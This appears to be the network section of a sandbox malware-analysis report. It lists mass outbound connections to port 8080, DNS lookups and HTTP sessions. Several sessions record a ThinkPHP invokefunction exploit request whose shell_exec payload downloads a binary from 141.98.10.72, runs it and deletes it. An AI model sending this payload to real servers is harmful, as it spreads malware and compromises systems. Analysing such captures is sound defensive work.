Feb 14, 2024 09:28:49.292190075 CET	6752	8080	192.168.2.15	85.142.183.251
Feb 14, 2024 09:28:49.292202950 CET	6752	8080	192.168.2.15	85.106.241.201
Feb 14, 2024 09:28:49.292207956 CET	6752	8080	192.168.2.15	94.174.238.51
Feb 14, 2024 09:28:49.292218924 CET	6752	8080	192.168.2.15	85.69.177.18
Feb 14, 2024 09:28:49.292226076 CET	6752	8080	192.168.2.15	85.133.12.112
Feb 14, 2024 09:28:49.292243958 CET	6752	8080	192.168.2.15	95.178.184.42
Feb 14, 2024 09:28:49.292243958 CET	6752	8080	192.168.2.15	85.119.84.135
Feb 14, 2024 09:28:49.292257071 CET	6752	8080	192.168.2.15	85.98.38.156
Feb 14, 2024 09:28:49.292275906 CET	6752	8080	192.168.2.15	94.119.187.127
Feb 14, 2024 09:28:49.292275906 CET	6752	8080	192.168.2.15	62.162.10.211
Feb 14, 2024 09:28:49.292289019 CET	6752	8080	192.168.2.15	85.104.122.91
Feb 14, 2024 09:28:49.292289019 CET	6752	8080	192.168.2.15	31.99.218.211
Feb 14, 2024 09:28:49.292289019 CET	6752	8080	192.168.2.15	94.200.105.214
Feb 14, 2024 09:28:49.292301893 CET	6752	8080	192.168.2.15	62.197.51.162
Feb 14, 2024 09:28:49.292304039 CET	6752	8080	192.168.2.15	94.111.244.208
Feb 14, 2024 09:28:49.292327881 CET	6752	8080	192.168.2.15	62.159.184.80
Feb 14, 2024 09:28:49.292329073 CET	6752	8080	192.168.2.15	85.211.87.151
Feb 14, 2024 09:28:49.292331934 CET	6752	8080	192.168.2.15	62.12.225.71
Feb 14, 2024 09:28:49.292346001 CET	6752	8080	192.168.2.15	31.229.91.163
Feb 14, 2024 09:28:49.292346001 CET	6752	8080	192.168.2.15	94.5.251.250
Feb 14, 2024 09:28:49.292361975 CET	6752	8080	192.168.2.15	31.179.168.254
Feb 14, 2024 09:28:49.292367935 CET	6752	8080	192.168.2.15	95.88.64.245
Feb 14, 2024 09:28:49.292382002 CET	6752	8080	192.168.2.15	31.146.128.121
Feb 14, 2024 09:28:49.292386055 CET	6752	8080	192.168.2.15	94.107.186.229
Feb 14, 2024 09:28:49.292397022 CET	6752	8080	192.168.2.15	31.173.115.189
Feb 14, 2024 09:28:49.292408943 CET	6752	8080	192.168.2.15	85.158.237.178
Feb 14, 2024 09:28:49.292421103 CET	6752	8080	192.168.2.15	95.241.221.108
Feb 14, 2024 09:28:49.292423964 CET	6752	8080	192.168.2.15	62.126.177.159
Feb 14, 2024 09:28:49.292438030 CET	6752	8080	192.168.2.15	95.171.78.77
Feb 14, 2024 09:28:49.292450905 CET	6752	8080	192.168.2.15	94.3.82.168
Feb 14, 2024 09:28:49.292459965 CET	6752	8080	192.168.2.15	31.178.155.188
Feb 14, 2024 09:28:49.292471886 CET	6752	8080	192.168.2.15	31.91.52.50
Feb 14, 2024 09:28:49.292474985 CET	6752	8080	192.168.2.15	94.71.126.100
Feb 14, 2024 09:28:49.292489052 CET	6752	8080	192.168.2.15	31.83.100.253
Feb 14, 2024 09:28:49.292498112 CET	6752	8080	192.168.2.15	95.238.114.251
Feb 14, 2024 09:28:49.292510033 CET	6752	8080	192.168.2.15	62.237.226.194
Feb 14, 2024 09:28:49.292522907 CET	6752	8080	192.168.2.15	31.121.44.167
Feb 14, 2024 09:28:49.292545080 CET	6752	8080	192.168.2.15	95.174.62.187
Feb 14, 2024 09:28:49.292545080 CET	6752	8080	192.168.2.15	94.62.183.209
Feb 14, 2024 09:28:49.292552948 CET	6752	8080	192.168.2.15	62.31.57.97
Feb 14, 2024 09:28:49.292581081 CET	6752	8080	192.168.2.15	95.70.136.138
Feb 14, 2024 09:28:49.292582035 CET	6752	8080	192.168.2.15	95.133.233.32
Feb 14, 2024 09:28:49.292584896 CET	6752	8080	192.168.2.15	94.186.117.132
Feb 14, 2024 09:28:49.292589903 CET	6752	8080	192.168.2.15	31.95.8.135
Feb 14, 2024 09:28:49.292599916 CET	6752	8080	192.168.2.15	62.246.224.49
Feb 14, 2024 09:28:49.292615891 CET	6752	8080	192.168.2.15	94.37.234.101
Feb 14, 2024 09:28:49.292617083 CET	6752	8080	192.168.2.15	62.202.143.83
Feb 14, 2024 09:28:49.292623043 CET	6752	8080	192.168.2.15	95.251.224.153
Feb 14, 2024 09:28:49.292638063 CET	6752	8080	192.168.2.15	95.12.105.125
Feb 14, 2024 09:28:49.292644978 CET	6752	8080	192.168.2.15	94.134.45.246
Feb 14, 2024 09:28:49.292665005 CET	6752	8080	192.168.2.15	94.164.95.5
Feb 14, 2024 09:28:49.292673111 CET	6752	8080	192.168.2.15	94.221.198.228
Feb 14, 2024 09:28:49.292678118 CET	6752	8080	192.168.2.15	95.0.241.118
Feb 14, 2024 09:28:49.292678118 CET	6752	8080	192.168.2.15	62.253.114.226
Feb 14, 2024 09:28:49.292690039 CET	80	7840	112.169.109.50	192.168.2.15
Feb 14, 2024 09:28:49.292699099 CET	6752	8080	192.168.2.15	94.134.96.22
Feb 14, 2024 09:28:49.292705059 CET	6752	8080	192.168.2.15	94.106.135.0
Feb 14, 2024 09:28:49.292718887 CET	6752	8080	192.168.2.15	31.135.105.149
Feb 14, 2024 09:28:49.292722940 CET	6752	8080	192.168.2.15	95.227.2.181
Feb 14, 2024 09:28:49.292735100 CET	6752	8080	192.168.2.15	95.118.247.144
Feb 14, 2024 09:28:49.292742968 CET	6752	8080	192.168.2.15	94.48.38.81
Feb 14, 2024 09:28:49.292757034 CET	6752	8080	192.168.2.15	85.247.179.231
Feb 14, 2024 09:28:49.292761087 CET	6752	8080	192.168.2.15	94.58.133.126
Feb 14, 2024 09:28:49.292777061 CET	6752	8080	192.168.2.15	85.161.140.45
Feb 14, 2024 09:28:49.292789936 CET	6752	8080	192.168.2.15	62.171.177.79
Feb 14, 2024 09:28:49.292790890 CET	6752	8080	192.168.2.15	85.189.24.50
Feb 14, 2024 09:28:49.292804956 CET	6752	8080	192.168.2.15	31.15.159.224
Feb 14, 2024 09:28:49.292817116 CET	6752	8080	192.168.2.15	31.163.171.49
Feb 14, 2024 09:28:49.292824984 CET	6752	8080	192.168.2.15	62.168.70.92
Feb 14, 2024 09:28:49.292838097 CET	6752	8080	192.168.2.15	94.47.231.187
Feb 14, 2024 09:28:49.292848110 CET	6752	8080	192.168.2.15	31.194.187.123
Feb 14, 2024 09:28:49.292853117 CET	6752	8080	192.168.2.15	94.114.98.250
Feb 14, 2024 09:28:49.292862892 CET	6752	8080	192.168.2.15	62.117.126.203
Feb 14, 2024 09:28:49.292865038 CET	6752	8080	192.168.2.15	85.18.245.136
Feb 14, 2024 09:28:49.292877913 CET	6752	8080	192.168.2.15	94.34.205.89
Feb 14, 2024 09:28:49.292890072 CET	6752	8080	192.168.2.15	94.164.129.101
Feb 14, 2024 09:28:49.292896986 CET	6752	8080	192.168.2.15	95.226.38.117
Feb 14, 2024 09:28:49.292903900 CET	6752	8080	192.168.2.15	94.244.56.145
Feb 14, 2024 09:28:49.292911053 CET	6752	8080	192.168.2.15	62.181.158.45
Feb 14, 2024 09:28:49.292922020 CET	6752	8080	192.168.2.15	95.101.17.59
Feb 14, 2024 09:28:49.292941093 CET	6752	8080	192.168.2.15	94.218.9.250
Feb 14, 2024 09:28:49.292941093 CET	6752	8080	192.168.2.15	62.22.104.220
Feb 14, 2024 09:28:49.292946100 CET	6752	8080	192.168.2.15	95.10.85.113
Feb 14, 2024 09:28:49.292953014 CET	6752	8080	192.168.2.15	62.154.233.136
Feb 14, 2024 09:28:49.292978048 CET	6752	8080	192.168.2.15	62.226.150.133
Feb 14, 2024 09:28:49.292983055 CET	6752	8080	192.168.2.15	31.194.131.73
Feb 14, 2024 09:28:49.292983055 CET	6752	8080	192.168.2.15	95.230.128.231
Feb 14, 2024 09:28:49.292989969 CET	6752	8080	192.168.2.15	85.17.209.157
Feb 14, 2024 09:28:49.292999029 CET	6752	8080	192.168.2.15	95.255.123.249
Feb 14, 2024 09:28:49.293003082 CET	6752	8080	192.168.2.15	95.32.17.210
Feb 14, 2024 09:28:49.293020010 CET	6752	8080	192.168.2.15	95.181.228.183
Feb 14, 2024 09:28:49.293031931 CET	6752	8080	192.168.2.15	95.207.134.239
Feb 14, 2024 09:28:49.293047905 CET	6752	8080	192.168.2.15	85.4.248.233
Feb 14, 2024 09:28:49.293056011 CET	6752	8080	192.168.2.15	95.79.51.184
Feb 14, 2024 09:28:49.293059111 CET	6752	8080	192.168.2.15	85.213.123.199
Feb 14, 2024 09:28:49.293070078 CET	6752	8080	192.168.2.15	94.70.211.49
Feb 14, 2024 09:28:49.293078899 CET	6752	8080	192.168.2.15	94.197.139.148
Feb 14, 2024 09:28:49.293087959 CET	6752	8080	192.168.2.15	85.99.185.222
Feb 14, 2024 09:28:49.293101072 CET	6752	8080	192.168.2.15	31.233.193.131
Feb 14, 2024 09:28:49.293104887 CET	6752	8080	192.168.2.15	95.148.120.115
Feb 14, 2024 09:28:49.293124914 CET	6752	8080	192.168.2.15	85.245.184.81
Feb 14, 2024 09:28:49.293132067 CET	6752	8080	192.168.2.15	95.96.167.152
Feb 14, 2024 09:28:49.293133020 CET	6752	8080	192.168.2.15	62.123.119.183
Feb 14, 2024 09:28:49.293145895 CET	6752	8080	192.168.2.15	31.26.75.68
Feb 14, 2024 09:28:49.293148994 CET	6752	8080	192.168.2.15	95.255.77.203
Feb 14, 2024 09:28:49.293158054 CET	6752	8080	192.168.2.15	95.82.87.208
Feb 14, 2024 09:28:49.293169022 CET	6752	8080	192.168.2.15	95.169.133.127
Feb 14, 2024 09:28:49.293183088 CET	6752	8080	192.168.2.15	94.248.85.89
Feb 14, 2024 09:28:49.293184042 CET	6752	8080	192.168.2.15	62.113.38.85
Feb 14, 2024 09:28:49.293196917 CET	6752	8080	192.168.2.15	85.105.171.112
Feb 14, 2024 09:28:49.293196917 CET	6752	8080	192.168.2.15	62.6.243.233
Feb 14, 2024 09:28:49.293215990 CET	6752	8080	192.168.2.15	62.218.58.74
Feb 14, 2024 09:28:49.293221951 CET	6752	8080	192.168.2.15	95.39.196.66
Feb 14, 2024 09:28:49.293221951 CET	6752	8080	192.168.2.15	62.33.243.164
Feb 14, 2024 09:28:49.293241024 CET	6752	8080	192.168.2.15	85.151.189.82
Feb 14, 2024 09:28:49.293252945 CET	6752	8080	192.168.2.15	94.175.150.66
Feb 14, 2024 09:28:49.293256998 CET	6752	8080	192.168.2.15	95.10.206.15
Feb 14, 2024 09:28:49.293267012 CET	6752	8080	192.168.2.15	31.230.127.93
Feb 14, 2024 09:28:49.293272018 CET	6752	8080	192.168.2.15	85.32.190.248
Feb 14, 2024 09:28:49.293287039 CET	6752	8080	192.168.2.15	62.200.253.204
Feb 14, 2024 09:28:49.293296099 CET	6752	8080	192.168.2.15	94.150.209.77
Feb 14, 2024 09:28:49.293304920 CET	6752	8080	192.168.2.15	31.247.182.42
Feb 14, 2024 09:28:49.293313980 CET	6752	8080	192.168.2.15	31.163.52.129
Feb 14, 2024 09:28:49.293332100 CET	6752	8080	192.168.2.15	31.13.239.156
Feb 14, 2024 09:28:49.293337107 CET	6752	8080	192.168.2.15	95.27.187.185
Feb 14, 2024 09:28:49.293346882 CET	6752	8080	192.168.2.15	62.66.164.154
Feb 14, 2024 09:28:49.293360949 CET	6752	8080	192.168.2.15	31.185.44.221
Feb 14, 2024 09:28:49.293366909 CET	6752	8080	192.168.2.15	95.245.153.1
Feb 14, 2024 09:28:49.293390989 CET	6752	8080	192.168.2.15	94.20.85.106
Feb 14, 2024 09:28:49.293390989 CET	6752	8080	192.168.2.15	94.80.141.149
Feb 14, 2024 09:28:49.293404102 CET	6752	8080	192.168.2.15	95.165.180.205
Feb 14, 2024 09:28:49.293412924 CET	6752	8080	192.168.2.15	31.52.199.225
Feb 14, 2024 09:28:49.293420076 CET	6752	8080	192.168.2.15	62.225.138.187
Feb 14, 2024 09:28:49.293426991 CET	6752	8080	192.168.2.15	31.20.161.221
Feb 14, 2024 09:28:49.293438911 CET	6752	8080	192.168.2.15	85.159.66.2
Feb 14, 2024 09:28:49.293446064 CET	6752	8080	192.168.2.15	85.106.131.3
Feb 14, 2024 09:28:49.293462038 CET	6752	8080	192.168.2.15	94.155.131.189
Feb 14, 2024 09:28:49.293463945 CET	6752	8080	192.168.2.15	85.201.220.194
Feb 14, 2024 09:28:49.293479919 CET	6752	8080	192.168.2.15	31.31.95.195
Feb 14, 2024 09:28:49.293486118 CET	6752	8080	192.168.2.15	95.79.170.156
Feb 14, 2024 09:28:49.293492079 CET	80	51906	112.169.120.242	192.168.2.15
Feb 14, 2024 09:28:49.293500900 CET	6752	8080	192.168.2.15	94.101.19.107
Feb 14, 2024 09:28:49.293504000 CET	6752	8080	192.168.2.15	85.38.245.24
Feb 14, 2024 09:28:49.293509960 CET	6752	8080	192.168.2.15	85.51.114.189
Feb 14, 2024 09:28:49.293513060 CET	6752	8080	192.168.2.15	85.134.75.147
Feb 14, 2024 09:28:49.293528080 CET	6752	8080	192.168.2.15	31.28.124.171
Feb 14, 2024 09:28:49.293531895 CET	6752	8080	192.168.2.15	95.129.141.49
Feb 14, 2024 09:28:49.293557882 CET	51906	80	192.168.2.15	112.169.120.242
Feb 14, 2024 09:28:49.293557882 CET	6752	8080	192.168.2.15	31.164.209.71
Feb 14, 2024 09:28:49.293560028 CET	6752	8080	192.168.2.15	85.203.159.10
Feb 14, 2024 09:28:49.293566942 CET	6752	8080	192.168.2.15	31.58.182.199
Feb 14, 2024 09:28:49.293581009 CET	6752	8080	192.168.2.15	94.62.100.82
Feb 14, 2024 09:28:49.293591022 CET	6752	8080	192.168.2.15	95.143.101.119
Feb 14, 2024 09:28:49.293596983 CET	6752	8080	192.168.2.15	85.131.176.248
Feb 14, 2024 09:28:49.293613911 CET	6752	8080	192.168.2.15	94.226.160.9
Feb 14, 2024 09:28:49.293617010 CET	6752	8080	192.168.2.15	31.82.8.22
Feb 14, 2024 09:28:49.293627977 CET	6752	8080	192.168.2.15	62.239.16.13
Feb 14, 2024 09:28:49.293631077 CET	6752	8080	192.168.2.15	94.51.141.227
Feb 14, 2024 09:28:49.293644905 CET	6752	8080	192.168.2.15	62.247.204.78
Feb 14, 2024 09:28:49.293648005 CET	6752	8080	192.168.2.15	85.222.110.231
Feb 14, 2024 09:28:49.293663025 CET	6752	8080	192.168.2.15	94.85.189.135
Feb 14, 2024 09:28:49.293673992 CET	6752	8080	192.168.2.15	95.241.207.133
Feb 14, 2024 09:28:49.293682098 CET	6752	8080	192.168.2.15	62.5.86.142
Feb 14, 2024 09:28:49.293692112 CET	6752	8080	192.168.2.15	95.125.150.133
Feb 14, 2024 09:28:49.293710947 CET	6752	8080	192.168.2.15	31.253.30.194
Feb 14, 2024 09:28:49.293713093 CET	6752	8080	192.168.2.15	31.163.4.196
Feb 14, 2024 09:28:49.293729067 CET	6752	8080	192.168.2.15	94.210.138.129
Feb 14, 2024 09:28:49.293740034 CET	6752	8080	192.168.2.15	31.10.48.134
Feb 14, 2024 09:28:49.293751001 CET	6752	8080	192.168.2.15	85.134.92.166
Feb 14, 2024 09:28:49.293759108 CET	6752	8080	192.168.2.15	95.71.86.160
Feb 14, 2024 09:28:49.293772936 CET	6752	8080	192.168.2.15	62.162.141.2
Feb 14, 2024 09:28:49.293781042 CET	6752	8080	192.168.2.15	62.245.137.64
Feb 14, 2024 09:28:49.293787003 CET	6752	8080	192.168.2.15	95.225.59.134
Feb 14, 2024 09:28:49.293797970 CET	6752	8080	192.168.2.15	31.249.79.87
Feb 14, 2024 09:28:49.293804884 CET	6752	8080	192.168.2.15	85.117.43.70
Feb 14, 2024 09:28:49.293804884 CET	6752	8080	192.168.2.15	31.42.154.111
Feb 14, 2024 09:28:49.293811083 CET	6752	8080	192.168.2.15	62.121.17.27
Feb 14, 2024 09:28:49.293823004 CET	6752	8080	192.168.2.15	95.126.249.216
Feb 14, 2024 09:28:49.293833017 CET	6752	8080	192.168.2.15	31.205.44.76
Feb 14, 2024 09:28:49.293848038 CET	6752	8080	192.168.2.15	31.73.67.146
Feb 14, 2024 09:28:49.293849945 CET	6752	8080	192.168.2.15	94.95.45.188
Feb 14, 2024 09:28:49.293859005 CET	6752	8080	192.168.2.15	85.74.227.234
Feb 14, 2024 09:28:49.293873072 CET	6752	8080	192.168.2.15	94.87.31.37
Feb 14, 2024 09:28:49.293879032 CET	6752	8080	192.168.2.15	94.8.206.218
Feb 14, 2024 09:28:49.293884993 CET	6752	8080	192.168.2.15	95.105.103.66
Feb 14, 2024 09:28:49.293896914 CET	6752	8080	192.168.2.15	94.135.216.209
Feb 14, 2024 09:28:49.293903112 CET	6752	8080	192.168.2.15	94.9.107.54
Feb 14, 2024 09:28:49.293912888 CET	6752	8080	192.168.2.15	31.234.234.94
Feb 14, 2024 09:28:49.293926001 CET	6752	8080	192.168.2.15	94.229.139.155
Feb 14, 2024 09:28:49.293935061 CET	6752	8080	192.168.2.15	62.39.39.43
Feb 14, 2024 09:28:49.293947935 CET	6752	8080	192.168.2.15	95.206.232.128
Feb 14, 2024 09:28:49.293960094 CET	6752	8080	192.168.2.15	31.138.120.67
Feb 14, 2024 09:28:49.293962955 CET	6752	8080	192.168.2.15	85.43.116.83
Feb 14, 2024 09:28:49.293973923 CET	6752	8080	192.168.2.15	85.205.82.54
Feb 14, 2024 09:28:49.293973923 CET	6752	8080	192.168.2.15	94.171.27.29
Feb 14, 2024 09:28:49.293993950 CET	6752	8080	192.168.2.15	31.133.43.212
Feb 14, 2024 09:28:49.294002056 CET	6752	8080	192.168.2.15	95.149.8.57
Feb 14, 2024 09:28:49.294006109 CET	6752	8080	192.168.2.15	95.8.120.151
Feb 14, 2024 09:28:49.294020891 CET	6752	8080	192.168.2.15	62.171.230.3
Feb 14, 2024 09:28:49.294023037 CET	6752	8080	192.168.2.15	85.160.193.214
Feb 14, 2024 09:28:49.294035912 CET	6752	8080	192.168.2.15	95.53.154.102

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 14, 2024 09:31:28.000519037 CET	192.168.2.15	8.8.8.8	0x19ff	Standard query (0)	daisy.ubuntu.com	A (IP address)	IN (0x0001)	false
Feb 14, 2024 09:31:28.000519037 CET	192.168.2.15	8.8.8.8	0x2e27	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 14, 2024 09:31:28.102827072 CET	8.8.8.8	192.168.2.15	0x19ff	No error (0)	daisy.ubuntu.com		162.213.35.25	A (IP address)	IN (0x0001)	false
Feb 14, 2024 09:31:28.102827072 CET	8.8.8.8	192.168.2.15	0x19ff	No error (0)	daisy.ubuntu.com		162.213.35.24	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.15	58378	88.221.78.210	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:46.581700087 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:46.792071104 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:28:46 GMT Date: Wed, 14 Feb 2024 08:28:46 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 65 65 36 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 33 32 36 26 23 34 36 3b 31 39 38 36 39 33 32 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.eee6655f.1707899326.19869321</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.15	56704	88.149.181.115	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:46.591603041 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:46.812359095 CET	450	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:28:46 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.15	53226	88.119.167.115	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:46.591804028 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:46.813528061 CET	352	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:28:46 GMT Content-Type: text/html Content-Length: 150 Connection: close Strict-Transport-Security: max-age=15768000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.15	60060	112.175.243.56	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.077013969 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:47.359303951 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:28:47 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.15	35190	112.180.15.84	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.080472946 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:47.366687059 CET	506	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Wed, 14 Feb 2024 08:28:46 GMT Server: httpd Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 